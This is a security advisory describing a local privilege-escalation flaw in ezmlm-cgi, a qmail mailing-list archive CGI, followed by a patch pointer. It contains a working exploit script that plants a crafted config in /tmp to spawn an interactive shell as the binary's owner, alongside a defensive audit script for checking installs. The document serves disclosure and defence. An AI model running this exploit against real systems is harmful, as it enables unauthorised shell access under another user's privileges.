COMMAND

    ezmlm-cgi

SYSTEMS AFFECTED

    ezmlm-cgi

PROBLEM

    'vort-fu' found the following. Ezmlm is an easy-to-use mailing list
    manager for qmail. It ships with a CGI application that allows list
    archives to be browsed and reviewed over the web. The documentation
    states that the CGI should be installed setuid root, but in real-world
    environments many administrators are unlikely to blindly make setuid
    root any file they haven't written themselves (and then some).

    ezmlm-0.xx does not include ezmlm-cgi in any of its distributions;
    instead, ezmlm-cgi is available in the ezmlm-idx-0.xx package from
    www.ezmlm.org.

    Typically this file is setuid to some user x, allowing the CGI to
    access the mailing list configurations for that particular user.
    However, when not installed setuid root, ezmlm-cgi attempts to read
    its configuration file from the current working directory instead of
    /etc/ezmlm/. Thus anyone able to run the binary can supply their own
    configuration file and have ezmlm-cgi execute arbitrary commands with
    the effective user ID of the file's owner.

    Example code:

        #!/bin/sh
        #
        # ezmlm-cgi
        # vort@wiretapped.net

        cd /tmp
        export HTTP_HOST=x
        export SERVER_NAME=x
        export SCRIPT_NAME=x
        echo "0;1005;/home/2600/list;/tmp/x@/tmp/x;;;;/bin/sh" > /tmp/.ezcgirc
        echo "#!/bin/sh"  >  /tmp/x
        echo "/bin/sh -i" >> /tmp/x
        chmod +x /tmp/x
        /home/2600/2600-cgi/ezmlm-cgi
        rm -rf /tmp/x
        rm -rf /tmp/.ezcgirc

    It is interesting to note that, for a program which asks to be
    installed setuid root, it neither drops privileges when executing the
    banner directive of the configuration file nor makes any attempt to
    read the configuration from the base directory where the program is
    stored.

    Actually having this program setuid root will fix this particular
    bug, but don't be surprised if there are many others in the code.

    Default installations of ezmlm-idx-0.40 are not vulnerable, since
    ezmlm-cgi is not installed SUID by default. SUID root installations
    are not vulnerable, since in that execution mode ezmlm-cgi uses a
    fixed configuration file location and drops privileges. SUID user
    (user != root) installations are discussed in the man page but should
    be rare; whether they are vulnerable depends on the group and world
    execute permissions of the ezmlm-cgi binary.
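    As an added audit helper (not part of the advisory or of ezmlm-idx),
    the following POSIX sh script classifies an installed ezmlm-cgi binary
    by the conditions just listed: not setuid, setuid root, or setuid to a
    non-root user with or without group/world execute permission. The
    output labels and the ls -ln parsing are my own; the binary path is
    whatever the administrator passes in.

```sh
#!/bin/sh
# Added audit helper; not part of the advisory or of ezmlm-idx.
# Classifies an ezmlm-cgi binary by the conditions the advisory lists.

# classify_ezmlm_cgi UID PERMS
#   UID   numeric owner id; PERMS the mode string as printed by ls -l
#   (e.g. -rwsr-xr-x). Prints one of:
#   not-suid | suid-root | suid-user-exposed | suid-user-owner-only
classify_ezmlm_cgi() {
    uid=$1
    perms=$2
    # position 4 is 's' or 'S' only when the setuid bit is set
    case $perms in
        ???[sS]*) ;;
        *) echo not-suid; return 0 ;;      # default ezmlm-idx-0.40 install
    esac
    if [ "$uid" -eq 0 ]; then
        echo suid-root                      # fixed config path, drops privileges
        return 0
    fi
    # setuid to a non-root user: exposed if group (pos 7) or world (pos 10)
    # can execute it, because the config is then read from the caller's cwd
    case $perms in
        ??????[xs]*|?????????[xt]*) echo suid-user-exposed ;;
        *) echo suid-user-owner-only ;;
    esac
}

# audit_ezmlm_cgi PATH: read owner and mode with ls -ln (portable across
# GNU and BSD ls: field 1 is the mode string, field 3 the numeric uid)
audit_ezmlm_cgi() {
    [ -f "$1" ] || { echo "missing: $1" >&2; return 1; }
    set -- $(ls -ln "$1")
    classify_ezmlm_cgi "$3" "$1"
}

# Usage: ./audit.sh /path/to/ezmlm-cgi  (path supplied by the admin)
if [ -n "${1:-}" ]; then
    audit_ezmlm_cgi "$1"
fi
```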

    ezmlm-idx-0.40 is an add-on to Dan Bernstein's ezmlm-0.53 package.

SOLUTION

    A patched version of ezmlm-cgi.c and ezmlm-cgi.1 (the man page), as
    well as the patch itself (ezmlm-cgi.patch), are available from

        ftp://ftp.ezmlm.org/pub/patches/ and http://www.ezmlm.org/pub/patches/

    This version removes support for the execution of banner programs.
    HTML banners are still supported.